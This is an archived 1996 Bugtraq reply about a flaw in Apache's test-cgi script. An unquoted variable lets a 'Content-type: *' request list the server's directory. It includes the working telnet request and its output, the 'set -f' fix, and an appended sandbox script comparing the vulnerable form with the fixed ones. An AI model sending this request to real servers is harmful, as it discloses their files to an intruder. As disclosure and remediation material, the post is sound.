Bugtraq mailing list archives

Re: Vulnerability in test-cgi


From: im14u2c () cegt201 bradley edu (Joe Zbiciak)
Date: Tue, 3 Dec 1996 22:17:18 -0600


And then Ed Arnold went and said something like this:

|
|Another data point for anyone out there running Apache ... test-cgi
|in the apache-1.1.1 distribution already has the required
|
|echo QUERY_STRING = "$QUERY_STRING"
|

However, it does not have the necessary quotes around the "$CONTENT_TYPE"
string.  Therefore it's still vulnerable in its default configuration.
Adding "set -f" as the second line of the script closes the hole completely.

(www) frankenstein:~$ (echo POST /cgi-bin/test-cgi HTTP/1.0; echo Content-type: \* ; echo Content-length: 0; echo; 
sleep 5) | telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
HTTP/1.0 200 OK
Date: Wed, 04 Dec 1996 04:11:15 GMT
Server: Apache/1.1.1
Content-type: text/plain

CGI/1.0 test script report:

argc is 0. argv is .

SERVER_SOFTWARE = Apache/1.1.1
SERVER_NAME = frankenstein.asylum.net
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = POST
HTTP_ACCEPT =
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING =
REMOTE_HOST = localhost
REMOTE_ADDR = 127.0.0.1
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE = (bunch of files listed here, whose names I don't care to share)
CONTENT_LENGTH = 0
Connection closed by foreign host.
(www) frankenstein:~$
--
:======= Joe Zbiciak =======:      Bonehead Quotes of 1992 (5 of 14)
:- - im14u2c () bradley edu - -:"Until recently the word fascist was considered
: - - - - - http: - - - - - : shameful. Fortunately that time has passed.
://ee1.bradley.edu/~im14u2c/: In fact, there is now a reassessment of how
:======= DISCLAIMER: =======: much Grandpa Benito did for Italy."
:   It's all right... -  - -- -- Alessandra Mussolini, announcing her plan
-- -  -   I didn't do it!   :    to run for parliament as a neofascist
(462:834 11:15)
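The unquoted-expansion problem discussed above, reproduced outside a web server as an added example (not code from the original post or from the Apache distribution). It runs the script's `echo CONTENT_TYPE = $CONTENT_TYPE` line in a constructed temporary directory with made-up file names, first unquoted as in the unpatched script, then with the two fixes mentioned in the thread: quoting the variable, and `set -f` as the script's second line.

```shell
#!/bin/sh
# test-cgi in effect runs:   echo CONTENT_TYPE = $CONTENT_TYPE
# Unquoted, the value is word-split and glob-expanded by the shell, so a
# request header of "*" turns into a listing of the script's directory.

# Constructed sandbox standing in for cgi-bin; file names are made up.
SANDBOX=$(mktemp -d)
: > "$SANDBOX/test-cgi"
: > "$SANDBOX/nph-example"
: > "$SANDBOX/secret.conf"

# Vulnerable form: unquoted expansion, exactly as in the unpatched script.
vulnerable_echo() {
    ( cd "$SANDBOX" && CONTENT_TYPE="$1" && echo CONTENT_TYPE = $CONTENT_TYPE )
}

# Fix 1: quote the expansion (what Apache 1.1.1 already did for QUERY_STRING).
quoted_echo() {
    ( cd "$SANDBOX" && CONTENT_TYPE="$1" && echo "CONTENT_TYPE = $CONTENT_TYPE" )
}

# Fix 2: set -f disables pathname expansion for the whole script, which
# covers every unquoted echo at once (the "second line" fix from the post).
noglob_echo() {
    ( cd "$SANDBOX" && set -f && CONTENT_TYPE="$1" && echo CONTENT_TYPE = $CONTENT_TYPE )
}

# Detection helper: did the output leak a file name from the sandbox?
leaks_filename() {
    case "$1" in
        *secret.conf*) return 0 ;;
        *) return 1 ;;
    esac
}

# Run all three variants with the same header value and clean up.
run_demo() {
    header='*'
    VULN_OUT=$(vulnerable_echo "$header")
    QUOTED_OUT=$(quoted_echo "$header")
    NOGLOB_OUT=$(noglob_echo "$header")
    rm -rf "$SANDBOX"
}

run_demo
printf 'unquoted : %s\n' "$VULN_OUT"     # lists nph-example secret.conf test-cgi
printf 'quoted   : %s\n' "$QUOTED_OUT"   # CONTENT_TYPE = *
printf 'set -f   : %s\n' "$NOGLOB_OUT"   # CONTENT_TYPE = *
```
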